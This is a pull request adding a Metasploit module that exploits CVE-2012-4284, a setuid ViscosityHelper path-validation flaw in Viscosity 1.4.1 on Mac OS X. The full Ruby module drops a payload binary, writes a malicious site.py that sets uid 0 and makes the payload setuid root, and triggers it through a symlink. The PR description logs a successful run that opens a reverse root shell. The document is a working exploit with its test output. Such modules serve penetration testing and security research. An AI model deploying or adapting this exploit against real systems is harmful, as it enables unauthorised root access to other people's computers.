### PR TITLE
added module for cve-2012-4284

### DIFF
--- a/modules/exploits/osx/local/setuid_viscosity.rb
+++ b/modules/exploits/osx/local/setuid_viscosity.rb
@@ -9,9 +9,7 @@ require 'msf/core'
 require 'rex'
 require 'msf/core/post/common'
 require 'msf/core/post/file'
-require 'msf/core/post/linux/priv'
 require 'msf/core/exploit/exe'
-
 
 class Metasploit4 < Msf::Exploit::Local
 	Rank = ExcellentRanking
@@ -58,7 +56,7 @@ class Metasploit4 < Msf::Exploit::Local
 		register_options([
 				# These are not OptPath becuase it's a *remote* path
 				OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
-				OptString.new("Viscosity",   [ true, "Path to setuid nmap executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ])
+				OptString.new("Viscosity",   [ true, "Path to setuid ViscosityHelper executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ])
 			], self.class)
 	end
 
@@ -91,14 +89,15 @@ class Metasploit4 < Msf::Exploit::Local
 		print_status("Dropping executable #{@exe_file}")
 		write_file(@exe_file, generate_payload_exe)
 
-		evil_python = %Q{
+		evil_python =<<-EOF
 import os
 os.setuid(0)
 os.setgid(0)
 os.system("chown root #{@exe_file}")
 os.system("chmod 6777 #{@exe_file}")
 os.execl("#{@exe_file}", "#{exe_name}")
-		}
+		EOF
+
 		@python_file = "#{datastore["WritableDir"]}/site.py"
 		print_status("Dropping python #{@python_file}...")
 		write_file(@python_file, evil_python)

--- a/modules/exploits/osx/local/setuid_viscosity.rb
+++ b/modules/exploits/osx/local/setuid_viscosity.rb
@@ -1,0 +1,122 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/linux/priv'
+require 'msf/core/exploit/exe'
+
+
+class Metasploit4 < Msf::Exploit::Local
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::EXE
+	include Msf::Post::File
+	include Msf::Post::Common
+
+	def initialize(info={})
+		super( update_info( info, {
+				'Name'           => 'Setuid Viscosity Exploit',
+				'Description'    => %q{
+						This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The
+					vulnerability exists in the setuid ViscosityHelper, where an insufficient
+					validation of path names allows execution of arbitrary python code as root.
+					This module has been tested successfully on Viscosity 1.4.1 over Mac OS X
+					10.7.5.
+				},
+				'References'     =>
+					[
+						[ 'CVE', '2012-4284' ],
+						[ 'OSVDB', '84709' ],
+						[ 'EDB', '20485' ],
+						[ 'URL', 'http://blog.zx2c4.com/791' ]
+					],
+				'License'        => MSF_LICENSE,
+				'Author'         =>
+					[
+						'Jason A. Donenfeld', # Vulnerability discovery and original Exploit
+						'juan vazquez'        # Metasploit module
+					],
+				'DisclosureDate' => 'Aug 12 2012',
+				'Platform'       => 'osx',
+				'Arch'           => [ ARCH_X86, ARCH_X64 ],
+				'SessionTypes'   => [ 'shell' ],
+				'Targets'        =>
+					[
+						[ 'Viscosity 1.4.1 / Mac OS X x86',    { 'Arch' => ARCH_X86 } ],
+						[ 'Viscosity 1.4.1 / Mac OS X x64',    { 'Arch' => ARCH_X64 } ]
+					],
+				'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
+				'DefaultTarget' => 0
+			}))
+		register_options([
+				# These are not OptPath becuase it's a *remote* path
+				OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
+				OptString.new("Viscosity",   [ true, "Path to setuid nmap executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ])
+			], self.class)
+	end
+
+	def check
+		if not file?(datastore["Viscosity"])
+			print_error "ViscosityHelper not found"
+			return CheckCode::Safe
+		end
+
+		check = session.shell_command_token("find  #{datastore["Viscosity"]} -type f -user root -perm -4000")
+
+		if check =~ /ViscosityHelper/
+			return CheckCode::Vulnerable
+		end
+
+		return CheckCode::Safe
+	end
+
+	def clean
+		file_rm(@link)
+		file_rm(@python_file)
+		file_rm("#{@python_file}c")
+		file_rm(@exe_file)
+	end
+
+	def exploit
+
+		exe_name = rand_text_alpha(8)
+		@exe_file = "#{datastore["WritableDir"]}/#{exe_name}"
+		print_status("Dropping executable #{@exe_file}")
+		write_file(@exe_file, generate_payload_exe)
+
+		evil_python = %Q{
+import os
+os.setuid(0)
+os.setgid(0)
+os.system("chown root #{@exe_file}")
+os.system("chmod 6777 #{@exe_file}")
+os.execl("#{@exe_file}", "#{exe_name}")
+		}
+		@python_file = "#{datastore["WritableDir"]}/site.py"
+		print_status("Dropping python #{@python_file}...")
+		write_file(@python_file, evil_python)
+
+		print_status("Creating symlink...")
+		link_name = rand_text_alpha(8)
+		@link = "#{datastore["WritableDir"]}/#{link_name}"
+		cmd_exec "ln -s -f -v #{datastore["Viscosity"]} #{@link}"
+
+		print_status("Running...")
+		begin
+			cmd_exec "#{@link}"
+		rescue
+			print_error("Failed. Cleaning files #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}...")
+			clean
+			return
+		end
+		print_warning("Remember to clean files: #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}")
+	end
+end
+


### PR DESCRIPTION
Tested successfully Viscosity 1.4.1 over Mac OS X 10.7.5.

Application can be downloaded from exploit-db:
http://www.exploit-db.com/wp-content/themes/exploit/applications/62c33243ebb9040007beba0cb39f7dae-Viscosity1.4.1.dmg

Test:

```
msf  exploit(setuid_viscosity) > check
[+] The target is vulnerable.
msf  exploit(setuid_viscosity) > exploit

[*] Started reverse handler on 192.168.1.128:4444 
[*] Dropping executable /tmp/egTMmACP
[*] Dropping python /tmp/site.py...
[*] Creating symlink...
[*] Running...
[*] Command shell session 2 opened (192.168.1.128:4444 -> 192.168.1.128:50965) at 2013-03-03 13:20:34 +0100
[!] Remember to clean files: /tmp/jSYsjiKM, /tmp/site.py, /tmp/site.pyc and /tmp/egTMmACP

id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),33(_appstore),61(localaccounts),80(admin),98(_lpadmin),100(_lpoperator),204(_developer),402(com.apple.sharepoint.group.1),401(com.apple.access_screensharing)
^C
Abort session 2? [y/N]  y

[*] 192.168.1.128 - Command shell session 2 closed.  Reason: User exit

```
